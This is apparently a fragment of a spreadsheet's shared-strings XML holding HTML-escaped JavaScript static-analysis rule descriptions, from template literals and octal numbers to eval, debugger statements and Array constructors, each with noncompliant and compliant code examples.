    <t>&lt;p&gt;Template strings allow developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is\ndone by using expressions like &lt;code&gt;${variable} &lt;/code&gt; in a string between two back-ticks (&lt;code&gt;`&lt;/code&gt;). However, when used in a regular string\nliteral (between double or single quotes) the template will not be evaluated and will be used as a literal, which is probably not what was\nintended.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nconsole.log("Today is ${date}"); // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nconsole.log(`Today is ${date}`);\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Return of boolean literal statements wrapped into &lt;code&gt;if-then-else&lt;/code&gt; ones should be simplified. &lt;/p&gt;\n&lt;p&gt;Note that if the result of the expression is not a boolean but for instance an integer, then double negation should be used for proper\nconversion.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (expression) {\n  return true;\n} else {\n  return false;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nreturn expression;\n&lt;/pre&gt;\n&lt;p&gt;or &lt;/p&gt;\n&lt;pre&gt;\nreturn !!expression;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;A generator without a &lt;code&gt;yield&lt;/code&gt; statement is at best confusing, and at worst a bug in your code, since the iterator produced by your code\nwill always be empty. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction* myGen(a, b) {  // Noncompliant\n  let answer = 0;\n  answer += a * b;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction* myGen(a, b) {\n  let answer = 0;\n  while (answer &amp;lt; 42) {\n    answer += a * b;\n    yield answer;\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of operators pairs (&lt;code&gt;=+&lt;/code&gt;, &lt;code&gt;=-&lt;/code&gt; or &lt;code&gt;=!&lt;/code&gt;) where the reversed, single operator was meant (&lt;code&gt;+=&lt;/code&gt;,\n&lt;code&gt;-=&lt;/code&gt; or &lt;code&gt;!=&lt;/code&gt;) will compile and run, but not produce the expected results.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when &lt;code&gt;=+&lt;/code&gt;, &lt;code&gt;=-&lt;/code&gt; and &lt;code&gt;=!&lt;/code&gt; are used without any space between the two operators and when\nthere is at least one whitespace after.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet target =-5;\nlet num = 3;\n\ntarget =- num;  // Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; // Noncompliant; target = 3\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nlet target = -5;\nlet num = 3;\n\ntarget = -num;  // Compliant; intent to assign inverse value of num is clear\ntarget += num;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S103</t>
  </si>
  <si>
    <t>&lt;p&gt;The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar count = 0;\n\nfunction go(i = count++) {  // Noncompliant\n  console.log(i);\n}\n\ngo();  // outputs 0\ngo(7); // outputs 7\ngo();  // outputs 1\n&lt;/pre&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;alert(...)&lt;/code&gt; as well as &lt;code&gt;confirm(...)&lt;/code&gt; and &lt;code&gt;prompt(...)&lt;/code&gt; can be useful for debugging during development, but in\nproduction mode this kind of pop-up could expose sensitive information to attackers, and should never be displayed. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif(unexpectedCondition) {\n  alert("Unexpected Condition");\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure\n  &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated; use {rule:javascript:S4507} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1321</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of the &lt;code&gt;with&lt;/code&gt; keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n&lt;code&gt;with&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Using &lt;code&gt;with&lt;/code&gt; allows a short-hand access to an object's properties - assuming they're already set. But use &lt;code&gt;with&lt;/code&gt; to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. Since the effects of &lt;code&gt;with&lt;/code&gt; are entirely dependent on the object passed to it, &lt;code&gt;with&lt;/code&gt; can be dangerously\nunpredictable, and should never be used.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nwith (foo) {  // Noncompliant\n  y = 4;  // updates foo.y\n  x = 3;  // does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + " " + x); // shows: undefined 3\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + " " + x); // shows: 3 a\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Testing &lt;code&gt;for&lt;/code&gt; loop termination using an equality operator (&lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt;) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (var i = 1; i != 10; i += 2)  // Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfor (var i = 1; i &amp;lt;= 10; i += 2)  // Compliant\n{\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Equality operators are ignored if the loop counter is not modified within the body of the loop and either:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; starts below the ending value and is incremented by 1 on each iteration. &lt;/li&gt;\n  &lt;li&gt; starts above the ending value and is decremented by 1 on each iteration. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Equality operators are also ignored when the test is against &lt;code&gt;null&lt;/code&gt;.&lt;/p&gt;\n&lt;pre&gt;\nfor (var i = 0; arr[i] != null; i++) {\n  // ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n  // ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/835"&gt;MITRE, CWE-835&lt;/a&gt; - Loop with Unreachable Exit Condition ('Infinite Loop') &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/EwDJAQ"&gt;CERT, MSC21-C.&lt;/a&gt; - Use robust loop termination conditions &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1314</t>
  </si>
  <si>
    <t>&lt;p&gt;Integer literals starting with a zero are octal rather than decimal values. While using octal values is fully supported, most developers do not\nhave experience with them. They may not recognize octal values as such, mistaking them instead for decimal values.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar myNumber = 010;   // Noncompliant. myNumber will hold 8, not 10 - was this really expected?\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar myNumber = 8;\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/_QC7AQ"&gt;CERT, DCL18-C.&lt;/a&gt; - Do not begin integer constants with 0 when specifying a\n  decimal value &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/hYClBg"&gt;CERT, DCL50-J.&lt;/a&gt; - Use visually distinct identifiers &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Once you've made a selection, you typically want to know whether it actually found anything. Since selectors &lt;em&gt;always&lt;/em&gt; return an object (the\nset of selected DOM elements), the best way to see whether your selection found anything is to test the returned object's &lt;code&gt;.length&lt;/code&gt;\nproperty. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif ( $( "div.foo" ) ) {  // Noncompliant\n  // this code always runs, even when the selector didn't match any elements\n  // ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\n// Testing whether a selection contains elements.\nif ( $( "div.foo" ).length &amp;gt; 0) {\n  // this code only runs if elements were found\n  //  ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1439</t>
  </si>
  <si>
    <t>Only "while", "do", "for" and "switch" statements should be labelled</t>
  </si>
  <si>
    <t>&lt;p&gt;Any statement or block of statements can be identified by a label, but those labels should be used only on &lt;code&gt;while&lt;/code&gt;,\n&lt;code&gt;do-while&lt;/code&gt;, &lt;code&gt;for&lt;/code&gt; and &lt;code&gt;switch&lt;/code&gt; statements. Using labels in any other context leads to unstructured, confusing code.\n&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nmyLabel: if (i % 2 == 0) {  // Noncompliant\n  if (i == 12) {\n    console.log("12");\n    break myLabel;\n  }\n  console.log("Odd number, but not 12");\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nmyLabel: for (i = 0; i &amp;lt; 10; i++) {   // Compliant\n  console.log("Loop");\n  break myLabel;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Code is clearest when each statement has its own line. Nonetheless, it is a common pattern to combine on the same line an &lt;code&gt;if&lt;/code&gt; and its\nresulting &lt;em&gt;then&lt;/em&gt; statement. However, when an &lt;code&gt;if&lt;/code&gt; is placed on the same line as the closing &lt;code&gt;}&lt;/code&gt; from a preceding\n&lt;em&gt;then&lt;/em&gt;, &lt;em&gt;else&lt;/em&gt; or &lt;em&gt;else if&lt;/em&gt; part, it is either an error - &lt;code&gt;else&lt;/code&gt; is missing - or the invitation to a future error as\nmaintainers fail to understand that the two statements are unconnected.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (condition1) {\n  // ...\n} if (condition2) {  // Noncompliant\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (condition1) {\n  // ...\n} else if (condition2) {\n  //...\n}\n&lt;/pre&gt;\n&lt;p&gt;Or&lt;/p&gt;\n&lt;pre&gt;\nif (condition1) {\n  // ...\n}\n\nif (condition2) {\n  //...\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;There are situations where &lt;code&gt;super()&lt;/code&gt; must be invoked and situations where &lt;code&gt;super()&lt;/code&gt; cannot be invoked.&lt;/p&gt;\n&lt;p&gt;The basic rule is: a constructor in a non-derived class cannot invoke &lt;code&gt;super()&lt;/code&gt;; a constructor in a derived class must invoke\n&lt;code&gt;super()&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Furthermore:&lt;/p&gt;\n&lt;p&gt;- &lt;code&gt;super()&lt;/code&gt; must be invoked before the &lt;code&gt;this&lt;/code&gt; and &lt;code&gt;super&lt;/code&gt; keywords can be used.&lt;/p&gt;\n&lt;p&gt;- &lt;code&gt;super()&lt;/code&gt; must be invoked with the same number of arguments as the base class' constructor.&lt;/p&gt;\n&lt;p&gt;- &lt;code&gt;super()&lt;/code&gt; can only be invoked in a constructor - not in any other method.&lt;/p&gt;\n&lt;p&gt;- &lt;code&gt;super()&lt;/code&gt; cannot be invoked multiple times in the same constructor.&lt;/p&gt;\n&lt;h3&gt;Known Limitations&lt;/h3&gt;\n&lt;ul&gt;\n  &lt;li&gt; False negatives: some issues are not raised if the base class is not defined in the same file as the current class. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super();         // Noncompliant\n    super.doSomething();\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super.doSomething();\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Many of JavaScript's &lt;code&gt;Array&lt;/code&gt; methods return an altered version of the array while leaving the source array intact. &lt;code&gt;reverse&lt;/code&gt;\nand &lt;code&gt;sort&lt;/code&gt; do not fall into this category. Instead, they alter the source array &lt;em&gt;in addition to&lt;/em&gt; returning the altered version,\nwhich is likely not what was intended.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when the return values of these methods are assigned, which could lead maintainers to overlook the fact that the original\nvalue is altered.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar b = a.reverse(); // Noncompliant\nvar d = c.sort(); // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar b = [...a].reverse();  // de-structure and create a new array, so reverse doesn't impact 'a'\na.reverse();\n\nc.sort(); // this sorts array in place\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;p&gt;Case 1, the code is syntactically correct but the behavior is not the expected one&lt;/p&gt;\n&lt;pre&gt;\nswitch (day) {\n  case MONDAY:\n  case TUESDAY:\n  WEDNESDAY:   // instead of "case WEDNESDAY"\n    doSomething();\n    break;\n  ...\n}\n&lt;/pre&gt;\n&lt;p&gt;Case 2, the code is correct and behaves as expected but is hardly readable &lt;/p&gt;\n&lt;pre&gt;\nswitch (day) {\n  case MONDAY:\n    break;\n  case TUESDAY:\n    foo:for(i = 0 ; i &amp;lt; X ; i++) {\n         /* ... */\n        break foo;  // this break statement doesn't relate to the nesting case TUESDAY\n         /* ... */\n    }\n    break;\n    /* ... */\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;p&gt;Case 1&lt;/p&gt;\n&lt;pre&gt;\nswitch (day) {\n  case MONDAY:\n  case TUESDAY:\n  case WEDNESDAY:\n    doSomething();\n    break;\n  ...\n}\n&lt;/pre&gt;\n&lt;p&gt;Case 2&lt;/p&gt;\n&lt;pre&gt;\nswitch (day) {\n  case MONDAY:\n    break;\n  case TUESDAY:\n    compute(args); // put the content of the labelled "for" statement in a dedicated method\n    break;\n\n    /* ... */\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1523</t>
  </si>
  <si>
    <t>Dynamically executing code is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9807"&gt;CVE-2017-9807&lt;/a&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9802"&gt;CVE-2017-9802&lt;/a&gt; &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific\nmeta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of &lt;a\nhref="https://www.owasp.org/index.php/Code_Injection"&gt;Injected Code&lt;/a&gt;. Such attacks can either run on the server or in the client (exemple: XSS\nattack) and have a huge impact on an application's security.&lt;/p&gt;\n&lt;p&gt;This rule raises issues on calls to &lt;code&gt;eval&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; constructor. This rule does not detect code injections. It only\nhighlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.&lt;/p&gt;\n&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; the executed code may come from an untrusted source and hasn't been sanitized. &lt;/li&gt;\n  &lt;li&gt; you really need to run code dynamically. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;\n&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;\n&lt;p&gt;Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the\ncode in a &lt;a href="https://en.wikipedia.org/wiki/Sandbox_(computer_security)"&gt;sandboxed&lt;/a&gt; environment. Use jails, firewalls and whatever means your\noperating system and programming language provide (example: &lt;a\nhref="https://wiki.sei.cmu.edu/confluence/display/java/SEC54-J.+Create+a+secure+sandbox+using+a+security+manager"&gt;Security Managers&lt;/a&gt; in java, &lt;a\nhref="https://www.w3schools.com/tags/att_iframe_sandbox.asp"&gt;iframes&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Same-origin_policy"&gt;same-origin\npolicy&lt;/a&gt; for javascript in a web browser).&lt;/p&gt;\n&lt;p&gt;Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.&lt;/p&gt;\n&lt;p&gt;Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.&lt;/p&gt;\n&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet value = eval('obj.' + propName); // Sensitive\nlet func = Function('obj' + propName); // Sensitive\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;This rule will not raise an issue when the argument of the &lt;code&gt;eval&lt;/code&gt; or &lt;code&gt;Function&lt;/code&gt; is a literal string as it is reasonably\nsafe.&lt;/p&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/95.html"&gt;MITRE CWE-95&lt;/a&gt; - Improper Neutralization of Directives in Dynamically Evaluated Code\n  ('Eval Injection') &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1525</t>
  </si>
  <si>
    <t>&lt;p&gt;The debugger statement can be placed anywhere in procedures to suspend execution. Using the debugger statement is similar to setting a breakpoint\nin the code. By definition such statement must absolutely be removed from the source code to prevent any unexpected behavior or added vulnerability to\nattacks in production.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (i = 1; i&amp;lt;5; i++) {\n  // Print i to the Output window.\n  Debug.write("loop index is " + i);\n  // Wait for user to resume.\n  debugger;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfor (i = 1; i&amp;lt;5; i++) {\n  // Print i to the Output window.\n  Debug.write("loop index is " + i);\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure\n  &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated; use {rule:javascript:S4507} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1526</t>
  </si>
  <si>
    <t>Variables declared with "var" should be declared before they are used</t>
  </si>
  <si>
    <t>&lt;p&gt;Variables declared with &lt;code&gt;var&lt;/code&gt; have the special property that regardless of where they're declared in a function they "float" to the top\nof the function and are available for use even before they're declared. That makes scoping confusing, especially for new coders. &lt;/p&gt;\n&lt;p&gt;To keep confusion to a minimum, &lt;code&gt;var&lt;/code&gt; declarations should happen before they are used for the first time.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar x = 1;\n\nfunction fun(){\n  alert(x); // Noncompliant as x is declared later in the same scope\n  if(something) {\n    var x = 42; // Declaration in function scope (not block scope!) shadows global variable\n  }\n}\n\nfun(); // Unexpectedly alerts "undefined" instead of "1"\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar x = 1;\n\nfunction fun() {\n  print(x);\n  if (something) {\n    x = 42;\n  }\n}\n\nfun(); // Print "1"\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1527</t>
  </si>
  <si>
    <t>&lt;p&gt;The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;code&gt;await&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;class&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;const&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;enum&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;export&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;extends&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;implements&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;import&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;interface&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;let&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;package&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;private&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;protected&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;public&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;static&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;super&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;yield&lt;/code&gt; &lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Use of these words as identifiers would produce an error in JavaScript &lt;code&gt;strict&lt;/code&gt; mode code.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar package = document.getElementsByName("foo"); // Noncompliant\nvar someData = { package: true };                 // Compliant, as it is not used as an identifier here\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar elements = document.getElementsByName("foo"); // Compliant\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1528</t>
  </si>
  <si>
    <t>&lt;p&gt;Array literals should always be preferred to Array constructors.&lt;/p&gt;\n&lt;p&gt;Array constructors are error-prone due to the way their arguments are interpreted. If more than one argument is used, the array length will be\nequal to the number of arguments. However, using a single argument will have one of three consequences:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; If the argument is a number and it is a natural number the length will be equal to the value of the argument. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;pre&gt;\nlet arr = new Array(3); // [empty × 3]\n&lt;/pre&gt;\n&lt;ul&gt;\n  &lt;li&gt; If the argument is a number, but not a natural number an exception will be thrown. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;pre&gt;\nlet arr = new Array(3.14);  // RangeError: Invalid array length\n&lt;/pre&gt;\n&lt;ul&gt;\n  &lt;li&gt; Otherwise the array will have one element with the argument as its value. &lt;/li&gt;\n&lt;/ul&gt;\n&lt;pre&gt;\nlet arr = new Array("3");  // ["3"]\n&lt;/pre&gt;\n&lt;p&gt;Note that even if you set the length of an array, it will be empty. That is, it will have the number of elements you declared, but they won't\ncontain anything, so no callbacks will be applied to the array elements.&lt;/p&gt;\n&lt;p&gt;For these reasons, if someone changes the code to pass 1 argument instead of 2 arguments, the array might not have the expected length. To avoid\nthese kinds of weird cases, always use the more readable array literal initialization format.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet myArray = new Array(x1, x2, x3);   // Noncompliant. Results in 3-element array.\nlet emptyArray = new Array();          // Noncompliant. Results in 0-element array.\n\nlet unstableArray = new Array(n);      // Noncompliant. Variable in results.\n\nlet arr = new Array(3); // Noncompliant; empty array of length 3\narr.foreach((x) =&amp;gt; alert("Hello " + x)); // callback is not executed because there's nothing in arr\nlet anotherArr = arr.map(() =&amp;gt; 42); // anotherArr is also empty because callback didn't execute\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nlet myArray = [x1, x2, x3];\nlet emptyArray = [];\n\n// if "n" is the only array element\nlet unstableArray = [n];\n// or,  if "n" is the array length (since ES 2015)\nlet unstableArray = Array.from({length: n});\n\nlet arr = ["Elena", "Mike", "Sarah"];\narr.foreach((x) =&amp;gt; alert("Hello " + x));\nlet anotherArr = arr.map(() =&amp;gt; 42);  // anotherArr now holds 42 in each element\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1529</t>
  </si>
  <si>
    <t>&lt;p&gt;The bitwise operators &lt;code&gt;&amp;amp;&lt;/code&gt;, &lt;code&gt;|&lt;/code&gt; can be mistaken for the boolean operators &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; and &lt;code&gt;||&lt;/code&gt;.\n&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when &lt;code&gt;&amp;amp;&lt;/code&gt; or &lt;code&gt;|&lt;/code&gt; is used in a boolean context.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (a &amp;amp; b) { ... } // Noncompliant; &amp;amp; used in error\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (a &amp;amp;&amp;amp; b) { ... }\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;When a file contains other bitwise operations, (&lt;code&gt;^&lt;/code&gt;, &lt;code&gt;&amp;lt;&amp;lt;&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;&lt;/code&gt;,\n&lt;code&gt;~&lt;/code&gt;, &lt;code&gt;&amp;amp;=&lt;/code&gt;, &lt;code&gt;^=&lt;/code&gt;, &lt;code&gt;|=&lt;/code&gt;, &lt;code&gt;&amp;lt;&amp;lt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;&amp;gt;&amp;gt;=&lt;/code&gt; and\n&lt;code&gt;&amp;amp;&lt;/code&gt; or &lt;code&gt;|&lt;/code&gt; used with a numeric literal as the right operand) all issues in the file are ignored, because it is evidence that\nbitwise operations are truly intended in the file.&lt;/p&gt;</t>
  </si>
  <si>
